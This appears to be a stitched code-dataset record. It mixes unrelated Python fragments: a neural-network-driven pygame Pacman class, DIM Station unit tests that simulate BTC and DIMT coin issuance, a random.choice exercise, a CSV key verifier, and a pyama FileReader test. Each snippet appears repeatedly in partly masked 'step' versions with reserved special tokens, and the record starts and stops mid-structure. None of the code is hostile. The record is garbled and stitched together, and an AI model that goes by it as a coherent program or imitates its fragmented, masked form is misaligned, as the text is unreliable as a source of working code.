def getVel(self):\n return self.vel_x, self.vel_y\n\n def killPacman(self):\n self.isAlive = False\n",
"step-5": "import pygame\nfrom config import *\nfrom Map import *\nfrom NeuralNetwork import *\n\n\nclass Pacman(object):\n RADIUS = int(TILE_WIDTH/2)\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n\n self.vel_x = 1\n self.vel_y = 0\n\n self.isAlive = True\n\n self.Frame = 0\n self.score = 0\n\n self.count = 0\n self.count2 = 0\n self.lastMove = \"\"\n self.movesCount = 0\n\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n\n self.handle_mov(input_data)\n self.handle_colision()\n\n if(self.count > TimeToStarve):\n self.killPacman()\n \n\n if(self.Frame == FPS/MPS):\n self.Frame = 0\n \n \n def handle_colision(self):\n if(self.mapa.map[self.pos_y][self.pos_x] == 2):\n self.mapa.getFruit(self.pos_y,self.pos_x)\n self.count = 0\n self.score += 1\n\n\n def draw(self, win):\n pygame.draw.circle(\n win,\n pygame.color.Color(\"yellow\"),\n (\n self.pos_x * TILE_WIDTH + self.RADIUS,\n self.pos_y * TILE_HEIGHT + self.RADIUS\n ), self.RADIUS\n )\n\n \n\n def handle_mov(self, input_data):\n movement = (self.vel_x, self.vel_y)\n vel_list = {\n 'up': (0, -1),\n 'down': (0, 1),\n 'left': (-1, 0),\n 'right': (1, 0)\n }\n\n movement = vel_list[self.neural_network.nextaction(input_data)]\n if self.lastMove == movement:\n self.movesCount += 1\n else:\n self.movesCount = 0\n self.lastMove = movement\n\n\n if(self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]] != 1):\n self.vel_x, self.vel_y = movement\n \n if(self.Frame == (FPS/MPS) and self.mapa.map[self.pos_y + self.vel_y][self.pos_x + self.vel_x] != 1):\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y\n self.count2 += 1\n \n self.count += 1\n\n def getPos(self):\n return (self.pos_x, self.pos_y)\n \n def getVel(self):\n return (self.vel_x, self.vel_y)\n \n def killPacman(self):\n self.isAlive = False",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
<|reserved_special_token_0|>
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while spent + package <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year,
day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while spent + package <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year,
day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import unittest
from dimp import ID, NetworkID
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while spent + package <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year,
day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""
DIM Station Test
~~~~~~~~~~~~~~~~
Unit test for DIM Station
"""
import unittest
from dimp import ID, NetworkID
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while (spent + package) <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while (spent + package) <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "533d0b883a0bbbb148f04826e4c0a2bcc31732e9",
"index": 6702,
"step-1": "<mask token>\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n <mask token>\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while spent + package <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year,\n day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while spent + package <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year,\n day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport unittest\nfrom dimp import ID, NetworkID\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while spent + package <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year,\n day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n DIM Station Test\n ~~~~~~~~~~~~~~~~\n\n Unit test for DIM Station\n\"\"\"\n\nimport unittest\n\nfrom dimp import ID, NetworkID\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while (spent + package) <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while (spent + package) <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
print("Praktikum Programa Komputer ")
print("Exercise 7.21")
print("")
print("===========================")
print("Nama : Ivanindra Rizky P")
print("NIM : I0320054")
print("")
print("===========================")
print("")
import random
a = [23, 45, 98, 36]
print('a = ', a)
print('random 1')
print('choice = ', random.choice(a))
print('random 2')
print('choice = ', random.choice(a))
print('random 3')
print('choice = ', random.choice(a))
|
normal
|
{
"blob_id": "6b731e329eec3947a17ef8ee8280f2ddf980c81c",
"index": 7154,
"step-1": "<mask token>\n",
"step-2": "print('Praktikum Programa Komputer ')\nprint('Exercise 7.21')\nprint('')\nprint('===========================')\nprint('Nama : Ivanindra Rizky P')\nprint('NIM : I0320054')\nprint('')\nprint('===========================')\nprint('')\n<mask token>\nprint('a = ', a)\nprint('random 1')\nprint('choice = ', random.choice(a))\nprint('random 2')\nprint('choice = ', random.choice(a))\nprint('random 3')\nprint('choice = ', random.choice(a))\n",
"step-3": "print('Praktikum Programa Komputer ')\nprint('Exercise 7.21')\nprint('')\nprint('===========================')\nprint('Nama : Ivanindra Rizky P')\nprint('NIM : I0320054')\nprint('')\nprint('===========================')\nprint('')\n<mask token>\na = [23, 45, 98, 36]\nprint('a = ', a)\nprint('random 1')\nprint('choice = ', random.choice(a))\nprint('random 2')\nprint('choice = ', random.choice(a))\nprint('random 3')\nprint('choice = ', random.choice(a))\n",
"step-4": "print('Praktikum Programa Komputer ')\nprint('Exercise 7.21')\nprint('')\nprint('===========================')\nprint('Nama : Ivanindra Rizky P')\nprint('NIM : I0320054')\nprint('')\nprint('===========================')\nprint('')\nimport random\na = [23, 45, 98, 36]\nprint('a = ', a)\nprint('random 1')\nprint('choice = ', random.choice(a))\nprint('random 2')\nprint('choice = ', random.choice(a))\nprint('random 3')\nprint('choice = ', random.choice(a))\n",
"step-5": "print(\"Praktikum Programa Komputer \")\r\nprint(\"Exercise 7.21\")\r\nprint(\"\")\r\nprint(\"===========================\")\r\nprint(\"Nama : Ivanindra Rizky P\")\r\nprint(\"NIM : I0320054\")\r\nprint(\"\")\r\nprint(\"===========================\")\r\nprint(\"\")\r\nimport random\r\na = [23, 45, 98, 36]\r\nprint('a = ', a)\r\nprint('random 1')\r\nprint('choice = ', random.choice(a))\r\nprint('random 2')\r\nprint('choice = ', random.choice(a))\r\nprint('random 3')\r\nprint('choice = ', random.choice(a))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ColumnKeyVerifier:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def epilogue(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
<|reserved_special_token_0|>
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
<|reserved_special_token_1|>
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
<|reserved_special_token_1|>
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
# 키는 첫번째 컬럼에만 설정 가능하다.
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
|
flexible
|
{
"blob_id": "eca4abf706fd094a40fdfc8ea483d71b0a018ce9",
"index": 4378,
"step-1": "<mask token>\n\n\nclass ColumnKeyVerifier:\n <mask token>\n <mask token>\n\n def epilogue(self):\n pass\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n <mask token>\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-3": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-4": "import sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-5": "\nimport sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\nclass ColumnKeyVerifier:\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n\n # 키는 첫번째 컬럼에만 설정 가능하다.\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n\n self.keys[key] = True\n\n return True\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment('name', 'file name')
line = (
' SNIPPET START A=B B=13 K=\'ha mi\' ZIG="ZA G" WITH hami -> "mami" '
)
FileReader('whatnot', ['onces']).analyze_parameters(line, segment)
self.assertEqual(segment.parameters['A'], 'B')
self.assertEqual(segment.parameters['B'], '13')
self.assertEqual(segment.parameters['K'], 'ha mi')
self.assertEqual(segment.parameters['ZIG'], 'ZA G')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment('name', 'file name')
line = (
' SNIPPET START A=B B=13 K=\'ha mi\' ZIG="ZA G" WITH hami -> "mami" '
)
FileReader('whatnot', ['onces']).analyze_parameters(line, segment)
self.assertEqual(segment.parameters['A'], 'B')
self.assertEqual(segment.parameters['B'], '13')
self.assertEqual(segment.parameters['K'], 'ha mi')
self.assertEqual(segment.parameters['ZIG'], 'ZA G')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from pyama.filereader import FileReader, Segment
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment('name', 'file name')
line = (
' SNIPPET START A=B B=13 K=\'ha mi\' ZIG="ZA G" WITH hami -> "mami" '
)
FileReader('whatnot', ['onces']).analyze_parameters(line, segment)
self.assertEqual(segment.parameters['A'], 'B')
self.assertEqual(segment.parameters['B'], '13')
self.assertEqual(segment.parameters['K'], 'ha mi')
self.assertEqual(segment.parameters['ZIG'], 'ZA G')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
#! /usr/bin/python
# -*- coding: utf8 -*-
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import unittest
from pyama.filereader import FileReader,Segment
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader(
"sample_reader_test.txt",
regexes=[(r'name="(\w+)"', 'END SEGMENT'),
(r'\s*\*\s*START\s*(\w+)', 'END SEGMENT'),
(r"PYTHON\s+SEGMENT\s+(\w[\w\d_]*)", None)]
)
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment("name","file name")
line = """ SNIPPET START A=B B=13 K='ha mi' ZIG="ZA G" WITH hami -> "mami" """
FileReader("whatnot",["onces"]).analyze_parameters(line,segment)
self.assertEqual(segment.parameters["A"],"B")
self.assertEqual(segment.parameters["B"],"13")
self.assertEqual(segment.parameters["K"],"ha mi")
self.assertEqual(segment.parameters["ZIG"],"ZA G")
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "92dc0bd3cfcddd98f99d8152d0221f047beb4fb0",
"index": 9492,
